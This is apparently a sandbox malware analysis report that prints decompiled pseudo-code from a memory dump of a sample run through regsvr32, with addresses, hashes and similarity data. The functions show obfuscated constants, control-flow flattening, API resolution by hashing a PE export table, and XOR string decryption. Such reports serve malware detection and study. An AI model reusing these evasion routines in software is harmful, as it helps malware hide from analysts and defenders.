				_v32 = _v32 ^ 0x016d12d1;
				_v20 = 0xc46992;
				_v20 = _v20 + 0xbf38;
				_t178 = 0x1d;
				_v20 = _v20 / _t178;
				_v20 = _v20 + 0xae20;
				_v20 = _v20 ^ 0x000bb178;
				_v48 = 0x634add;
				_v48 = _v48 | 0x23fb58f3;
				_v48 = _v48 ^ 0x23ffa6a1;
				_v16 = 0x1d1a05;
				_t179 = 0x49;
				_v16 = _v16 / _t179;
				_v16 = _v16 | 0x52a10316;
				_t180 = 0x3e;
				_v16 = _v16 / _t180;
				_v16 = _v16 ^ 0x015f80ea;
				_v12 = 0xce9650;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 | 0xc4d79ca6;
				_v12 = _v12 * 0x74;
				_v12 = _v12 ^ 0x31b19315;
				_v28 = 0x74c1da;
				_v28 = _v28 << 3;
				_v28 = _v28 << 4;
				_v28 = _v28 + 0xffffd949;
				_v28 = _v28 ^ 0x3a61849f;
				_v52 = 0xb6054c;
				_t181 = 0x7f;
				_v52 = _v52 / _t181;
				_v52 = _v52 ^ 0x000700c1;
				_v24 = 0x1ec994;
				_v24 = _v24 >> 1;
				_v24 = _v24 + 0xffff90be;
				_v24 = _v24 + 0xffffc472;
				_v24 = _v24 ^ 0x0003971a;
				_t154 = E001ABD6B(__ecx, __ecx, __ecx, __ecx, _v40);
				_t182 = _t154;
				if(_t154 != 0) {
					_t183 = E001BF73B(_v20, _v48, _v16, _v12, _a12, _t182,  &_v56);
					E001B02D8(_t182, _v28, _v52, _v24);
				}
				return _t183;
			}




























                                                                                                                0x001b7ba6
                                                                                                                0x001b7bae
                                                                                                                0x001b7bb1
                                                                                                                0x001b7bb4
                                                                                                                0x001b7bb7
                                                                                                                0x001b7bb9
                                                                                                                0x001b7bba
                                                                                                                0x001b7bbf
                                                                                                                0x001b7bc6
                                                                                                                0x001b7bc8
                                                                                                                0x001b7bd1
                                                                                                                0x001b7bd4
                                                                                                                0x001b7bd7
                                                                                                                0x001b7bde
                                                                                                                0x001b7be5
                                                                                                                0x001b7bec
                                                                                                                0x001b7bf8
                                                                                                                0x001b7bfd
                                                                                                                0x001b7c02
                                                                                                                0x001b7c06
                                                                                                                0x001b7c0d
                                                                                                                0x001b7c14
                                                                                                                0x001b7c1b
                                                                                                                0x001b7c22
                                                                                                                0x001b7c29
                                                                                                                0x001b7c30
                                                                                                                0x001b7c37
                                                                                                                0x001b7c3e
                                                                                                                0x001b7c45
                                                                                                                0x001b7c4c
                                                                                                                0x001b7c56
                                                                                                                0x001b7c5b
                                                                                                                0x001b7c60
                                                                                                                0x001b7c67
                                                                                                                0x001b7c6e
                                                                                                                0x001b7c78
                                                                                                                0x001b7c7d
                                                                                                                0x001b7c82
                                                                                                                0x001b7c89
                                                                                                                0x001b7c90
                                                                                                                0x001b7c97
                                                                                                                0x001b7c9e
                                                                                                                0x001b7ca5
                                                                                                                0x001b7caf
                                                                                                                0x001b7cb4
                                                                                                                0x001b7cb9
                                                                                                                0x001b7cc3
                                                                                                                0x001b7cc6
                                                                                                                0x001b7cc9
                                                                                                                0x001b7cd0
                                                                                                                0x001b7cd7
                                                                                                                0x001b7cdb
                                                                                                                0x001b7ce6
                                                                                                                0x001b7ce9
                                                                                                                0x001b7cf0
                                                                                                                0x001b7cf7
                                                                                                                0x001b7cfb
                                                                                                                0x001b7d01
                                                                                                                0x001b7d08
                                                                                                                0x001b7d0f
                                                                                                                0x001b7d1b
                                                                                                                0x001b7d21
                                                                                                                0x001b7d24
                                                                                                                0x001b7d2b
                                                                                                                0x001b7d32
                                                                                                                0x001b7d35
                                                                                                                0x001b7d3c
                                                                                                                0x001b7d43
                                                                                                                0x001b7d5c
                                                                                                                0x001b7d61
                                                                                                                0x001b7d68
                                                                                                                0x001b7d88
                                                                                                                0x001b7d90
                                                                                                                0x001b7d95
                                                                                                                0x001b7d9f

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: ea0b58b7ce2fc6767d65ef364a369dc025e088d061202e099b0601af30ddc4b7
                                                                                                                • Instruction ID: 8105daae8c34495ab8c0fd1de5c26cc9beb1a4af69f5a9a6964148a80e06099e
                                                                                                                • Opcode Fuzzy Hash: ea0b58b7ce2fc6767d65ef364a369dc025e088d061202e099b0601af30ddc4b7
                                                                                                                • Instruction Fuzzy Hash: 345114B1D00219EBDF14CFE6C9868EEBBB2FF88314F208159E511B6260C7B54A51CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BA683 Relevance: .1, Instructions: 121COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E001BA683(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t87;
				void* _t100;
				void* _t102;
				void* _t104;
				intOrPtr _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int* _t129;

				_t122 = _a8;
				_t102 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t87);
				_v76 = 0x39afd1;
				_t129 =  &(( &_v108)[4]);
				_v72 = 0xfa1290;
				_t123 = 0;
				_v68 = 0;
				_v64 = 0;
				_t104 = 0x963a914;
				_v104 = 0xdbf44d;
				_v104 = _v104 ^ 0x1bb24012;
				_v104 = _v104 + 0xffff5b62;
				_t124 = 0x52;
				_v104 = _v104 / _t124;
				_v104 = _v104 ^ 0x005b0c8e;
				_v92 = 0x2ce29a;
				_v92 = _v92 >> 5;
				_v92 = _v92 + 0xffffcf98;
				_v92 = _v92 ^ 0x00061092;
				_v108 = 0xe963c0;
				_v108 = _v108 | 0xb7c43538;
				_t125 = 0x7d;
				_v108 = _v108 * 0x1c;
				_v108 = _v108 + 0x8e32;
				_v108 = _v108 ^ 0x1df924c0;
				_v84 = 0x486686;
				_v84 = _v84 << 3;
				_v84 = _v84 ^ 0x024e1d30;
				_v96 = 0xfe9955;
				_v96 = _v96 / _t125;
				_v96 = _v96 ^ 0x7014b57f;
				_v96 = _v96 ^ 0x701f7fe5;
				_v88 = 0x4f8fd6;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x00053295;
				_v80 = 0x6476a3;
				_v80 = _v80 + 0x2789;
				_v80 = _v80 ^ 0x00671fa4;
				_v100 = 0x1b01a5;
				_t126 = 0x4c;
				_v100 = _v100 * 0x75;
				_v100 = _v100 >> 0xd;
				_v100 = _v100 / _t126;
				_v100 = _v100 ^ 0x0006fca2;
				do {
					while(_t104 != 0xe8dbcd) {
						if(_t104 == 0x1773ec0) {
							E001A6DD9( &_v60, _v104, _v92, _t102, _v108);
							_t129 =  &(_t129[3]);
							_t104 = 0x3bcb7b8;
							continue;
						} else {
							if(_t104 == 0x3bcb7b8) {
								_t100 = E001B6D3A( &_v60, _t122, _v84, _v96, _v88);
								_t129 =  &(_t129[3]);
								__eflags = _t100;
								if(__eflags != 0) {
									_t104 = 0xe8dbcd;
									continue;
								}
							} else {
								if(_t104 != 0x963a914) {
									goto L10;
								} else {
									_t104 = 0x1773ec0;
									continue;
								}
							}
						}
						goto L11;
					}
					__eflags = E001AA903(_v80, _t122 + 4, __eflags, _v100,  &_v60);
					_t123 =  !=  ? 1 : _t123;
					_t104 = 0xf5a1145;
					L10:
					__eflags = _t104 - 0xf5a1145;
				} while (__eflags != 0);
				L11:
				return _t123;
			}

























                                                                                                                0x001ba68a
                                                                                                                0x001ba691
                                                                                                                0x001ba693
                                                                                                                0x001ba694
                                                                                                                0x001ba69b
                                                                                                                0x001ba69c
                                                                                                                0x001ba69d
                                                                                                                0x001ba6a2
                                                                                                                0x001ba6aa
                                                                                                                0x001ba6ad
                                                                                                                0x001ba6b5
                                                                                                                0x001ba6b7
                                                                                                                0x001ba6bd
                                                                                                                0x001ba6c1
                                                                                                                0x001ba6c6
                                                                                                                0x001ba6ce
                                                                                                                0x001ba6d6
                                                                                                                0x001ba6e4
                                                                                                                0x001ba6e9
                                                                                                                0x001ba6ef
                                                                                                                0x001ba6f7
                                                                                                                0x001ba6ff
                                                                                                                0x001ba704
                                                                                                                0x001ba70c
                                                                                                                0x001ba714
                                                                                                                0x001ba71c
                                                                                                                0x001ba729
                                                                                                                0x001ba72c
                                                                                                                0x001ba730
                                                                                                                0x001ba738
                                                                                                                0x001ba740
                                                                                                                0x001ba748
                                                                                                                0x001ba74d
                                                                                                                0x001ba755
                                                                                                                0x001ba765
                                                                                                                0x001ba769
                                                                                                                0x001ba771
                                                                                                                0x001ba779
                                                                                                                0x001ba781
                                                                                                                0x001ba786
                                                                                                                0x001ba78e
                                                                                                                0x001ba796
                                                                                                                0x001ba79e
                                                                                                                0x001ba7a6
                                                                                                                0x001ba7b3
                                                                                                                0x001ba7b4
                                                                                                                0x001ba7b8
                                                                                                                0x001ba7c8
                                                                                                                0x001ba7cc
                                                                                                                0x001ba7d4
                                                                                                                0x001ba7d4
                                                                                                                0x001ba7de
                                                                                                                0x001ba82a
                                                                                                                0x001ba82f
                                                                                                                0x001ba832
                                                                                                                0x00000000
                                                                                                                0x001ba7e0
                                                                                                                0x001ba7e6
                                                                                                                0x001ba809
                                                                                                                0x001ba80e
                                                                                                                0x001ba811
                                                                                                                0x001ba813
                                                                                                                0x001ba815
                                                                                                                0x00000000
                                                                                                                0x001ba815
                                                                                                                0x001ba7e8
                                                                                                                0x001ba7ee
                                                                                                                0x00000000
                                                                                                                0x001ba7f0
                                                                                                                0x001ba7f0
                                                                                                                0x00000000
                                                                                                                0x001ba7f0
                                                                                                                0x001ba7ee
                                                                                                                0x001ba7e6
                                                                                                                0x00000000
                                                                                                                0x001ba7de
                                                                                                                0x001ba853
                                                                                                                0x001ba855
                                                                                                                0x001ba858
                                                                                                                0x001ba85d
                                                                                                                0x001ba85d
                                                                                                                0x001ba85d
                                                                                                                0x001ba86a
                                                                                                                0x001ba872

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 085fa649f1bf50db60e967f6246070b1a1cc04d7c49565a1decda229ba8295b7
                                                                                                                • Instruction ID: c64113a8a3b8fe4b781bd127ac7f722745c3bacefd5c06dacb724595555a6aef
                                                                                                                • Opcode Fuzzy Hash: 085fa649f1bf50db60e967f6246070b1a1cc04d7c49565a1decda229ba8295b7
                                                                                                                • Instruction Fuzzy Hash: A75187721083418BC718CF25D98542FFBE2FFD8748F50491EF5C9A6660C7768A088B97
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B66C8 Relevance: .1, Instructions: 109COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E001B66C8(intOrPtr __ecx, void* __edx) {
				intOrPtr _t96;
				signed int _t101;
				void* _t111;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t129;
				intOrPtr* _t130;
				intOrPtr _t133;
				void* _t134;
				void* _t135;

				_t133 =  *((intOrPtr*)(_t134 + 0x38));
				_push( *((intOrPtr*)(_t134 + 0x44)));
				 *((intOrPtr*)(_t134 + 0x24)) = __ecx;
				_push(_t133);
				_push( *((intOrPtr*)(_t134 + 0x44)));
				_push( *((intOrPtr*)(_t134 + 0x44)));
				_push(__edx);
				_push(__ecx);
				E001AC98A(__ecx);
				 *((intOrPtr*)(_t134 + 0x30)) = 0xc609f6;
				_t135 = _t134 + 0x18;
				 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 5;
				_t130 = 0;
				_t113 = 0x3e;
				 *(_t135 + 0x1c) =  *(_t135 + 0x18) * 0x4a;
				 *(_t135 + 0x1c) =  *(_t135 + 0x1c) ^ 0x01c9f6d6;
				 *(_t135 + 0x18) = 0x4bc33;
				 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 0xa;
				 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0x1b9f;
				 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0xc;
				 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x000e0e4a;
				 *(_t135 + 0x20) = 0x61f1eb;
				 *(_t135 + 0x20) =  *(_t135 + 0x20) << 3;
				 *(_t135 + 0x20) =  *(_t135 + 0x20) ^ 0x03096057;
				 *(_t135 + 0x14) = 0x75399;
				 *(_t135 + 0x14) =  *(_t135 + 0x14) / _t113;
				_t114 = 0x2b;
				 *(_t135 + 0x14) =  *(_t135 + 0x14) / _t114;
				 *(_t135 + 0x14) =  *(_t135 + 0x14) + 0xfffff167;
				 *(_t135 + 0x14) =  *(_t135 + 0x14) ^ 0xfff2e3f6;
				 *(_t135 + 0x44) = 0x84ac1f;
				_t115 = 0x13;
				 *(_t135 + 0x40) =  *(_t135 + 0x44) / _t115;
				 *(_t135 + 0x40) =  *(_t135 + 0x40) << 0xc;
				 *(_t135 + 0x40) =  *(_t135 + 0x40) + 0xffff5e1a;
				 *(_t135 + 0x40) =  *(_t135 + 0x40) ^ 0x6fbb0edc;
				_t96 =  *((intOrPtr*)(_t133 + 0x3c));
				_t129 =  *(_t135 + 0x18);
				 *((intOrPtr*)(_t135 + 0x30)) = _t96;
				_t111 =  *((intOrPtr*)(_t96 + _t133 + 0x78)) + _t133;
				 *((intOrPtr*)(_t135 + 0x2c)) =  *((intOrPtr*)(_t111 + 0x1c)) + _t133;
				_t117 =  *((intOrPtr*)(_t111 + 0x20)) + _t133;
				 *((intOrPtr*)(_t135 + 0x24)) =  *((intOrPtr*)(_t111 + 0x20)) + _t133;
				 *((intOrPtr*)(_t135 + 0x28)) =  *((intOrPtr*)(_t111 + 0x24)) + _t133;
				while(_t129 <  *((intOrPtr*)(_t111 + 0x18))) {
					_t101 = E001B2FAB( *(_t135 + 0x20),  *((intOrPtr*)(_t117 + _t129 * 4)) + _t133,  *((intOrPtr*)(_t135 + 0x24)),  *(_t135 + 0x14),  *(_t135 + 0x40));
					_t135 = _t135 + 0xc;
					if((_t101 ^ 0x1e6ea728) ==  *(_t135 + 0x20)) {
						_t130 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0x2c)) + ( *( *((intOrPtr*)(_t135 + 0x28)) + _t129 * 2) & 0x0000ffff) * 4)) + _t133;
						if(_t130 >= _t111 && _t130 <  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0x30)) + _t133 + 0x7c)) + _t111) {
							_t130 = E001ABB14(_t130);
						}
						L8:
						return _t130;
					}
					_t117 =  *((intOrPtr*)(_t135 + 0x24));
					_t129 = _t129 + 1;
				}
				goto L8;
			}














                                                                                                                0x001b66cd
                                                                                                                0x001b66d5
                                                                                                                0x001b66d9
                                                                                                                0x001b66dd
                                                                                                                0x001b66de
                                                                                                                0x001b66e2
                                                                                                                0x001b66e6
                                                                                                                0x001b66e7
                                                                                                                0x001b66e8
                                                                                                                0x001b66ed
                                                                                                                0x001b66f5
                                                                                                                0x001b66f8
                                                                                                                0x001b6704
                                                                                                                0x001b6708
                                                                                                                0x001b670b
                                                                                                                0x001b670f
                                                                                                                0x001b6717
                                                                                                                0x001b671f
                                                                                                                0x001b6724
                                                                                                                0x001b6731
                                                                                                                0x001b6735
                                                                                                                0x001b673d
                                                                                                                0x001b6745
                                                                                                                0x001b674a
                                                                                                                0x001b6752
                                                                                                                0x001b6762
                                                                                                                0x001b676a
                                                                                                                0x001b676f
                                                                                                                0x001b6775
                                                                                                                0x001b677d
                                                                                                                0x001b6785
                                                                                                                0x001b6791
                                                                                                                0x001b6794
                                                                                                                0x001b6798
                                                                                                                0x001b679d
                                                                                                                0x001b67a5
                                                                                                                0x001b67ad
                                                                                                                0x001b67b0
                                                                                                                0x001b67b4
                                                                                                                0x001b67bc
                                                                                                                0x001b67c6
                                                                                                                0x001b67ca
                                                                                                                0x001b67d1
                                                                                                                0x001b67d5
                                                                                                                0x001b6808
                                                                                                                0x001b67f0
                                                                                                                0x001b67fa
                                                                                                                0x001b6801
                                                                                                                0x001b681e
                                                                                                                0x001b6822
                                                                                                                0x001b6839
                                                                                                                0x001b6839
                                                                                                                0x001b683c
                                                                                                                0x001b6844
                                                                                                                0x001b6844
                                                                                                                0x001b6803
                                                                                                                0x001b6807
                                                                                                                0x001b6807
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 08be4f400afe8638c854dd42a0da104b59195b135d46cfbe8a384d3e629d9a2e
                                                                                                                • Instruction ID: 67a1b1c60375b368ef39bbe453e42d797ed7216ca40fe48d7b8691d353876789
                                                                                                                • Opcode Fuzzy Hash: 08be4f400afe8638c854dd42a0da104b59195b135d46cfbe8a384d3e629d9a2e
                                                                                                                • Instruction Fuzzy Hash: 774168B1A083018FC714CF25C88581BBBF1FBD8748F000A2DF985A7221D775EA49CB86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001AE4F5 Relevance: .1, Instructions: 106COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E001AE4F5(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t60;
				signed int _t67;
				unsigned int* _t81;
				signed int _t82;
				signed int _t84;
				signed int _t85;
				signed int _t89;
				unsigned int _t90;
				unsigned int _t91;
				unsigned int* _t96;
				signed int* _t98;
				signed int* _t99;
				unsigned int _t102;
				void* _t108;
				void* _t110;
				void* _t112;
				void* _t114;

				_push( *((intOrPtr*)(_t112 + 0x38)));
				_t100 = __edx;
				_push(__edx);
				E001AC98A(_t60);
				 *((intOrPtr*)(_t112 + 0x30)) = 0xc85959;
				asm("stosd");
				_t84 = 0x7f;
				asm("stosd");
				asm("stosd");
				 *(_t112 + 0x20) = 0xd79550;
				_t5 = _t100 + 4; // 0x1a17e4
				_t98 = _t5;
				 *(_t112 + 0x20) =  *(_t112 + 0x20) ^ 0xc496e2fd;
				 *(_t112 + 0x20) =  *(_t112 + 0x20) + 0x8818;
				 *(_t112 + 0x20) =  *(_t112 + 0x20) ^ 0xc44d0682;
				 *(_t112 + 0x1c) = 0x5b7d90;
				 *(_t112 + 0x1c) =  *(_t112 + 0x1c) | 0xcdfe43db;
				 *(_t112 + 0x1c) =  *(_t112 + 0x1c) ^ 0xd8c82edf;
				 *(_t112 + 0x1c) =  *(_t112 + 0x1c) / _t84;
				 *(_t112 + 0x1c) =  *(_t112 + 0x1c) ^ 0x00204617;
				 *(_t112 + 0x24) = 0x7cc493;
				 *(_t112 + 0x24) =  *(_t112 + 0x24) + 0x9e62;
				 *(_t112 + 0x24) =  *(_t112 + 0x24) ^ 0x007fda5d;
				 *(_t112 + 0x18) = 0xa2e5de;
				 *(_t112 + 0x18) =  *(_t112 + 0x18) >> 7;
				 *(_t112 + 0x18) =  *(_t112 + 0x18) + 0xfffff1ac;
				 *(_t112 + 0x18) =  *(_t112 + 0x18) ^ 0x490c9894;
				 *(_t112 + 0x18) =  *(_t112 + 0x18) ^ 0x4904b1a0;
				_t85 =  *__edx;
				_t99 =  &(_t98[1]);
				_t67 =  *_t98 ^ _t85;
				 *(_t112 + 0x28) = _t85;
				 *(_t112 + 0x2c) = _t67;
				_t43 = _t67 + 1; // 0xd8c82ee0
				_t101 = _t43;
				_t102 =  !=  ? (_t43 & 0xfffffffc) + 4 : _t43;
				_t81 = E001A303A(_t101 & 0x00000003, _t102);
				_t114 = _t112 + 0x14;
				 *(_t114 + 0x18) = _t81;
				if(_t81 != 0) {
					_t110 = 0;
					_t96 = _t81;
					_t108 =  >  ? 0 :  &(_t99[_t102 >> 2]) - _t99 + 3 >> 2;
					if(_t108 != 0) {
						_t82 =  *(_t114 + 0x20);
						do {
							_t89 =  *_t99;
							_t52 =  &(_t99[1]); // 0x2269bcbe
							_t99 = _t52;
							_t90 = _t89 ^ _t82;
							 *_t96 = _t90;
							_t96 =  &(_t96[1]);
							_t91 = _t90 >> 0x10;
							 *((char*)(_t96 - 3)) = _t90 >> 8;
							 *(_t96 - 2) = _t91;
							_t110 = _t110 + 1;
							 *((char*)(_t96 - 1)) = _t91 >> 8;
						} while (_t110 < _t108);
						_t81 =  *(_t114 + 0x1c);
					}
					 *((char*)(_t81 +  *((intOrPtr*)(_t114 + 0x24)))) = 0;
				}
				return _t81;
			}




















                                                                                                                0x001ae4fb
                                                                                                                0x001ae4ff
                                                                                                                0x001ae501
                                                                                                                0x001ae503
                                                                                                                0x001ae508
                                                                                                                0x001ae518
                                                                                                                0x001ae51b
                                                                                                                0x001ae51c
                                                                                                                0x001ae51d
                                                                                                                0x001ae51e
                                                                                                                0x001ae526
                                                                                                                0x001ae526
                                                                                                                0x001ae529
                                                                                                                0x001ae539
                                                                                                                0x001ae541
                                                                                                                0x001ae549
                                                                                                                0x001ae551
                                                                                                                0x001ae559
                                                                                                                0x001ae567
                                                                                                                0x001ae56b
                                                                                                                0x001ae573
                                                                                                                0x001ae57b
                                                                                                                0x001ae583
                                                                                                                0x001ae58b
                                                                                                                0x001ae593
                                                                                                                0x001ae598
                                                                                                                0x001ae5a0
                                                                                                                0x001ae5a8
                                                                                                                0x001ae5b0
                                                                                                                0x001ae5b4
                                                                                                                0x001ae5b7
                                                                                                                0x001ae5b9
                                                                                                                0x001ae5bd
                                                                                                                0x001ae5c1
                                                                                                                0x001ae5c1
                                                                                                                0x001ae5d1
                                                                                                                0x001ae5ee
                                                                                                                0x001ae5f0
                                                                                                                0x001ae5f3
                                                                                                                0x001ae5f9
                                                                                                                0x001ae601
                                                                                                                0x001ae603
                                                                                                                0x001ae614
                                                                                                                0x001ae619
                                                                                                                0x001ae61b
                                                                                                                0x001ae61f
                                                                                                                0x001ae61f
                                                                                                                0x001ae621
                                                                                                                0x001ae621
                                                                                                                0x001ae624
                                                                                                                0x001ae626
                                                                                                                0x001ae62d
                                                                                                                0x001ae630
                                                                                                                0x001ae633
                                                                                                                0x001ae636
                                                                                                                0x001ae63c
                                                                                                                0x001ae63d
                                                                                                                0x001ae640
                                                                                                                0x001ae644
                                                                                                                0x001ae644
                                                                                                                0x001ae64d
                                                                                                                0x001ae64d
                                                                                                                0x001ae659

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d75d1772c7219b20785abb7a195f1a2e2e441af678795809dd8cd4dcf7f945f3
                                                                                                                • Instruction ID: ae438224247e911b38e07eb4e1946647d651d50449f62aad67f5fe247d07991d
                                                                                                                • Opcode Fuzzy Hash: d75d1772c7219b20785abb7a195f1a2e2e441af678795809dd8cd4dcf7f945f3
                                                                                                                • Instruction Fuzzy Hash: EA419C72A093528FD314CF28C88545BFBE1FFA8318F054A2CF999A7211D774DA49CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BF5D9 Relevance: .1, Instructions: 105COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E001BF5D9(void* __ecx, void* __edx, void* __eflags) {
				void* _t54;
				signed int _t58;
				short* _t77;
				signed int _t78;
				signed int _t80;
				signed int _t85;
				unsigned int _t86;
				unsigned int _t87;
				short* _t90;
				signed int* _t92;
				signed int* _t93;
				signed int* _t94;
				unsigned int _t96;
				void* _t102;
				short _t104;
				void* _t106;
				void* _t108;

				_t94 =  *(_t106 + 0x34);
				_push( *((intOrPtr*)(_t106 + 0x3c)));
				_push(_t94);
				_push( *((intOrPtr*)(_t106 + 0x3c)));
				E001AC98A(_t54);
				 *(_t106 + 0x34) = 0x17b002;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				 *(_t106 + 0x4c) = 0xe3c440;
				_t92 =  &(_t94[1]);
				 *(_t106 + 0x4c) =  *(_t106 + 0x4c) + 0xaedf;
				 *(_t106 + 0x4c) =  *(_t106 + 0x4c) ^ 0xcc7c4f8e;
				 *(_t106 + 0x4c) =  *(_t106 + 0x4c) | 0x31260880;
				 *(_t106 + 0x4c) =  *(_t106 + 0x4c) ^ 0xfdb7815e;
				 *(_t106 + 0x28) = 0xce8556;
				 *(_t106 + 0x28) =  *(_t106 + 0x28) + 0xffff7840;
				 *(_t106 + 0x28) =  *(_t106 + 0x28) ^ 0x00c50c05;
				 *(_t106 + 0x20) = 0x81309a;
				 *(_t106 + 0x20) =  *(_t106 + 0x20) >> 6;
				 *(_t106 + 0x20) =  *(_t106 + 0x20) + 0x8f83;
				 *(_t106 + 0x20) =  *(_t106 + 0x20) ^ 0x00061142;
				 *(_t106 + 0x24) = 0xa40542;
				 *(_t106 + 0x24) =  *(_t106 + 0x24) + 0xffffd7fc;
				 *(_t106 + 0x24) =  *(_t106 + 0x24) ^ 0x00afd2be;
				_t80 =  *_t94;
				_t93 =  &(_t92[1]);
				_t58 =  *_t92 ^ _t80;
				 *(_t106 + 0x2c) = _t80;
				 *(_t106 + 0x30) = _t58;
				_t35 = _t58 + 1; // 0x1
				_t95 = _t35;
				_t96 =  !=  ? (_t35 & 0xfffffffc) + 4 : _t35;
				_t77 = E001A303A(_t95 & 0x00000003, _t96 + _t96);
				_t108 = _t106 + 0x1c;
				 *((intOrPtr*)(_t108 + 0x38)) = _t77;
				if(_t77 != 0) {
					_t104 = 0;
					_t90 = _t77;
					_t102 =  >  ? 0 :  &(_t93[_t96 >> 2]) - _t93 + 3 >> 2;
					if(_t102 != 0) {
						_t78 =  *(_t108 + 0x1c);
						do {
							_t85 =  *_t93;
							_t93 =  &(_t93[1]);
							_t86 = _t85 ^ _t78;
							 *_t90 = _t86 & 0x000000ff;
							_t90 = _t90 + 8;
							 *((short*)(_t90 - 6)) = _t86 >> 0x00000008 & 0x000000ff;
							_t87 = _t86 >> 0x10;
							_t104 = _t104 + 1;
							 *((short*)(_t90 - 4)) = _t87 & 0x000000ff;
							 *((short*)(_t90 - 2)) = _t87 >> 0x00000008 & 0x000000ff;
						} while (_t104 < _t102);
						_t77 =  *((intOrPtr*)(_t108 + 0x3c));
					}
					 *((short*)(_t77 +  *(_t108 + 0x20) * 2)) = 0;
				}
				return _t77;
			}




















                                                                                                                0x001bf5de
                                                                                                                0x001bf5e3
                                                                                                                0x001bf5e7
                                                                                                                0x001bf5e8
                                                                                                                0x001bf5ee
                                                                                                                0x001bf5f3
                                                                                                                0x001bf601
                                                                                                                0x001bf602
                                                                                                                0x001bf603
                                                                                                                0x001bf604
                                                                                                                0x001bf60c
                                                                                                                0x001bf60f
                                                                                                                0x001bf617
                                                                                                                0x001bf61f
                                                                                                                0x001bf627
                                                                                                                0x001bf62f
                                                                                                                0x001bf637
                                                                                                                0x001bf63f
                                                                                                                0x001bf647
                                                                                                                0x001bf64f
                                                                                                                0x001bf654
                                                                                                                0x001bf65c
                                                                                                                0x001bf664
                                                                                                                0x001bf66c
                                                                                                                0x001bf674
                                                                                                                0x001bf67c
                                                                                                                0x001bf680
                                                                                                                0x001bf683
                                                                                                                0x001bf685
                                                                                                                0x001bf689
                                                                                                                0x001bf68d
                                                                                                                0x001bf68d
                                                                                                                0x001bf69d
                                                                                                                0x001bf6bd
                                                                                                                0x001bf6bf
                                                                                                                0x001bf6c2
                                                                                                                0x001bf6c8
                                                                                                                0x001bf6d0
